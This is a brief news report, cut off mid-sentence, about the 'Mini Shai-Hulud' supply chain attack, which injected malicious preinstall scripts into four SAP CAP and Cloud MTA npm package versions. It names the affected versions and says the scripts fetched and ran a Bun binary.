SAP NPM Packages Targeted in Supply Chain Attack

Four SAP NPM packages have been injected with malicious code as part of a new supply chain attack, security researchers warn.

The campaign, referred to as Mini Shai-Hulud, is targeting packages linked to the SAP Cloud Application Programming (CAP) ecosystem and SAP cloud deployment workflows.

On April 29, four package versions were flagged as malicious, namely npm mbt 1.2.48, npm @cap-js/db-service 2.10.1, npm @cap-js/postgres 2.2.2, and npm @cap-js/sqlite 2.2.2.

With over 500,000 combined weekly downloads, these packages are SAP’s Cloud MTA Build Tool for building Multi-Target Application archives, and database service packages for CAP software.

These packages, Socket reports, were injected with a preinstall script working as a runtime bootstrapper. When executed, the script fetches a Bun ZIP from a GitHub repository, extracts it, and executes the included Bun binary.

According to Onapsis, the malicious package versions ...